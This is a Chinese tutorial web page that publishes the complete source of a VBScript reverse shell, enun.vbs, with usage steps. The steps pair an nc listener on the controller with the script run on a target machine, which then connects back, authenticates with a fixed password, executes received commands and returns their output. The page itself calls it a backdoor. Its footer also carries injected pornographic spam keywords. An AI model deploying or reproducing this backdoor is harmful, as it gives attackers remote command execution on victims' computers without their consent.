VBScript 打造自己的遠(yuǎn)程CMDShell附使用教程

來源：本站原創(chuàng)|時(shí)間：2020-01-10|欄目：vb|點(diǎn)擊：次

請(qǐng)先下載 mswinsck.ocx 與 VB6Controls.reg！

使用方法：

1，控制：nc.exe，執(zhí)行：nc -l -v -p 1234；

2，目標(biāo)：cscript.exe enun.vbs IP Port；

3，密碼：enun。

幾點(diǎn)說明：
1，退出 SHELL，請(qǐng)輸入 “exit”，不要用 “Ctrl + C”，這樣的話只能等目標(biāo)重啟或手動(dòng)運(yùn)行后門才能連接；
2，Windows 7 等環(huán)境下普通標(biāo)準(zhǔn)用戶也能使用，但是獲取的權(quán)限相對(duì)有限。
3，內(nèi)部命令及管道使用如下圖：

相關(guān)下載：
1，視頻演示
2，vb6controls

enun.vbs 源碼：

復(fù)制代碼代碼如下:

'--------------------------------------------------------------------------
' Copyright (c) lxzzr. All rights reserved.
' ScriptName: enun.vbs
' Creation Date: 28/8/2012
' Last Modified: 28/8/2012
' Author: lxzzr, www.enun.net
' E-mail: lxzzr@21cn.com
' Usage: Cscript.exe //nologo enun.vbs IP Port
'--------------------------------------------------------------------------
On Error Resume Next
Public SocketObj, ExecObj, ShellObj
RemoteHost = Wscript.Arguments(0)
RemotePort = Wscript.Arguments(1)

Do
Do While (SocketObj.State <> 7)
  WScript.Echo "Try Connect to " & RemoteHost & ":" & RemotePort & " ..."

  Set SocketObj = WScript.CreateObject("MSWinsock.Winsock")
  SocketObj.Protocol = 0
  SocketObj.RemoteHost = RemoteHost
  SocketObj.RemotePort = RemotePort
  SocketObj.Connect

  WScript.Sleep 3000
Loop

WScript.Echo "Connected to server."
SocketObj.SendData SocketObj.LocalHostName & " is Connected, Enter Password: "
Do While (SocketObj.BytesReceived = 0)
WScript.Sleep 10
Loop

'密碼驗(yàn)證
SocketObj.GetData Authkey, vbString
If Split(Authkey, chr(10), -1, 1)(0) = "enun" Then

  Set ShellObj = CreateObject("WScript.Shell")
  sRevData = " "
  SocketObj.SendData "Logon Success, Welcome!" & chr(13) & chr(10)

  '循環(huán)等待執(zhí)行命令
  Do
   Set ExecObj = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))

   SocketObj.SendData ExecObj.StdOut.ReadAll
   SocketObj.SendData ExecObj.StdErr.ReadAll

   If sRevData <> "" Then
    SocketObj.SendData chr(10) & "[" & SocketObj.LocalHostName & "@" & "enun]#: "
   End If

   If Left(sRevData, 4) = "exit" Then
    SocketObj.Close
    Exit Do
   End If

   SocketObj.GetData sRevData, vbString
   WScript.Sleep 1000
  Loop
Else
  LockoutBadCount = LockoutBadCount + 1
  SocketObj.SendData "Logon Failure: Unknown user name or bad password." & chr(13) & chr(10)
  WScript.Sleep 1000
End If

'賬戶策略
If (LockoutBadCount > 3) Then
  SocketObj.SendData "The User Account is locked!" & chr(13) & chr(10)
  WScript.Sleep 1000
  SocketObj.Close
  LockoutBadCount = 0
  WScript.Sleep 600*1000
End If
Loop

上一篇：用VBS實(shí)現(xiàn)的凱撒密碼算法

欄目：vb

下一篇：Win7下VHD文件右鍵增強(qiáng)實(shí)現(xiàn)代碼(vbs+注冊(cè)表)

本文標(biāo)題：VBScript 打造自己的遠(yuǎn)程CMDShell附使用教程

本文地址：http://mengdiqiu.com.cn/a1/vb/7330.html

更多vb

欧美大屁股bbbbxxxx,狼人大香伊蕉国产www亚洲,男ji大巴进入女人的视频小说,男人把ji大巴放进女人免费视频,免费情侣作爱视频

vb

VBScript 打造自己的遠(yuǎn)程CMDShell附使用教程

您可能感興趣的文章

閱讀排行

本欄相關(guān)

隨機(jī)閱讀